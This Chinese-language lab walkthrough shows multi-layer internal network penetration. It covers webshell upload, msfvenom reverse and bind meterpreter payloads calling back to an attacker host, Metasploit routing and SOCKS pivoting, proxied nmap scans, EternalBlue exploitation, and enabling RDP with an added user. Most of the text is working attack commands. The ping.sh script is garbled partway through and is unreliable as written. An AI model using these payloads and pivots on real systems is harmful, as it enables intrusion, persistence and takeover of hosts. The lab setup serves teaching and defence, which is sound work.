安全技术|一个实验了解多层内网渗透

访客 273 0
本文来源:锦行科技

近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

实验简介

网络拓扑图安全技术|一个实验了解多层内网渗透-第1张图片-网盾网络安全培训

渗透机:win10+kali

第一层靶机 (外网web服务器):  Linux

第二场靶机 (内网web服务器):  Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等。

环境搭建

第一层网络

把渗透机kali和win10网卡1设置选择VMnet1:

安全技术|一个实验了解多层内网渗透-第2张图片-网盾网络安全培训

靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

安全技术|一个实验了解多层内网渗透-第3张图片-网盾网络安全培训

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:安全技术|一个实验了解多层内网渗透-第4张图片-网盾网络安全培训

第三层网络

将靶机win7网卡1设置选择VMnet3:安全技术|一个实验了解多层内网渗透-第5张图片-网盾网络安全培训

再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。

第一台Linux

安全技术|一个实验了解多层内网渗透-第6张图片-网盾网络安全培训

第二台Linux安全技术|一个实验了解多层内网渗透-第7张图片-网盾网络安全培训


实验过程

第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马安全技术|一个实验了解多层内网渗透-第8张图片-网盾网络安全培训

安全技术|一个实验了解多层内网渗透-第9张图片-网盾网络安全培训

安全技术|一个实验了解多层内网渗透-第10张图片-网盾网络安全培训

蚁剑连接安全技术|一个实验了解多层内网渗透-第11张图片-网盾网络安全培训

*进一步做内网渗透,上传msf后门*

打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件安全技术|一个实验了解多层内网渗透-第12张图片-网盾网络安全培训

蚁剑把后门文件上传到Linux靶机安全技术|一个实验了解多层内网渗透-第13张图片-网盾网络安全培训

返回msf 开启监听

use exploit/multi/handler      使用监听模块

set payload linux/x64/meterpreter/reverse_tcp    使用和木马相同的payload

set lhost 192.168.85.128   kaili 的ip

set lport 4444        木马的端口

run             执行安全技术|一个实验了解多层内网渗透-第14张图片-网盾网络安全培训

蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

chmod 777 mshell.elf      加执行权限

./mshell.elf            执行文件

安全技术|一个实验了解多层内网渗透-第15张图片-网盾网络安全培训

Kail接受到MSF会话安全技术|一个实验了解多层内网渗透-第16张图片-网盾网络安全培训

输入ifconfig,发现第二层172.10.10.0/24网段

安全技术|一个实验了解多层内网渗透-第17张图片-网盾网络安全培训

添加路由

background     将会话转到后台

route add 172.10.10.0/24 1

添加 172.10.10.0/24网段 使用session1

route print    查看路由表

安全技术|一个实验了解多层内网渗透-第18张图片-网盾网络安全培训

使用MSF建立socks代理

use auxiliary/server/socks4a

set srvhost 192.168.85.128

set srvport 10080

run

安全技术|一个实验了解多层内网渗透-第19张图片-网盾网络安全培训

配置socks4代理的相关客户端Proxychains

在配置文件/etc/proxychains.conf中添加:

socks4 192.168.85.128 10080

vi /etc/proxychains.conf

安全技术|一个实验了解多层内网渗透-第20张图片-网盾网络安全培训

添加socks4 192.168.85.128 10080

安全技术|一个实验了解多层内网渗透-第21张图片-网盾网络安全培训

这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。

*建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络*

第二层网络

*nmap探测存在web服务的主机*

用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24

安全技术|一个实验了解多层内网渗透-第22张图片-网盾网络安全培训

扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip

安全技术|一个实验了解多层内网渗透-第23张图片-网盾网络安全培训

由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。

*脚本探测存活主机*

在本地创建一个名为ping.sh的脚本,脚本内容如下:

#!/bin/bash

ip="172.10.10."

echo "ping log:" > ./ping.txt

for i in {1..254}

do

ping -c 1 -w 1 -W 1 $ip$i | grep -q "ttl=" pty.spawn("/bin/bash")'

创建一个完全交互式shell,后

Chmod 777 ping.sh

./ping.sh

可以看到172.10.10.0/24网段存活56.57两台

安全技术|一个实验了解多层内网渗透-第24张图片-网盾网络安全培训

*知道存活主机ip后就可以继续进入第二层内网主机*

渗透机浏览器配置sock4a代理

安全技术|一个实验了解多层内网渗透-第25张图片-网盾网络安全培训安全技术|一个实验了解多层内网渗透-第26张图片-网盾网络安全培训

蚁剑加代理连接

安全技术|一个实验了解多层内网渗透-第27张图片-网盾网络安全培训

连接 http://172.10.10.56/upload/php1.php

安全技术|一个实验了解多层内网渗透-第28张图片-网盾网络安全培训

*进一步做内网渗透,继续上传msf后门*

*制作MSF后门*

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf后门文件

安全技术|一个实验了解多层内网渗透-第29张图片-网盾网络安全培训

因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。

蚁剑上传后门

安全技术|一个实验了解多层内网渗透-第30张图片-网盾网络安全培训安全技术|一个实验了解多层内网渗透-第31张图片-网盾网络安全培训

蚁剑打开虚拟终端执行后门文件

安全技术|一个实验了解多层内网渗透-第32张图片-网盾网络安全培训

返回会话

安全技术|一个实验了解多层内网渗透-第33张图片-网盾网络安全培训

输入ifconfig 发现第三层网络的网段10.10.10.0/24

安全技术|一个实验了解多层内网渗透-第34张图片-网盾网络安全培训

第三层网络

添加路由

background

route add 10.10.10.0/24 2

route print

安全技术|一个实验了解多层内网渗透-第35张图片-网盾网络安全培训

进入session 2 上传 脚本 探测存活主机

注意把脚本的ip段修改成该网段再上传

安全技术|一个实验了解多层内网渗透-第36张图片-网盾网络安全培训

探测到第三层网段的存活ip :10.10.10.101

安全技术|一个实验了解多层内网渗透-第37张图片-网盾网络安全培训

proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行

proxychains nmap -sT -Pn -p 1-500 10.10.10.101

安全技术|一个实验了解多层内网渗透-第38张图片-网盾网络安全培训

发现445端口开启

安全技术|一个实验了解多层内网渗透-第39张图片-网盾网络安全培训

尝试使用ms17-010

use windows/smb/ms17_010_eternalblue

set rhost 10.10.10.101

set payload windows/x64/meterpreter/bind_tcp

set lport 4466

安全技术|一个实验了解多层内网渗透-第40张图片-网盾网络安全培训

Run ,存在445漏洞

安全技术|一个实验了解多层内网渗透-第41张图片-网盾网络安全培训

执行成功,返回会话

安全技术|一个实验了解多层内网渗透-第42张图片-网盾网络安全培训

开启3389远程桌面

run post/windows/manage/enable_rdp     开启远程桌面

run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@#   添加远程用户

安全技术|一个实验了解多层内网渗透-第43张图片-网盾网络安全培训

将3389端口转回kali本地5555端口

portfwd add -l 5555 -p 3389 -r 10.10.10.101

安全技术|一个实验了解多层内网渗透-第44张图片-网盾网络安全培训

Win10远程桌面连接

安全技术|一个实验了解多层内网渗透-第45张图片-网盾网络安全培训

登陆成功

安全技术|一个实验了解多层内网渗透-第46张图片-网盾网络安全培训

标签: 内网渗透 网络安全技术

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~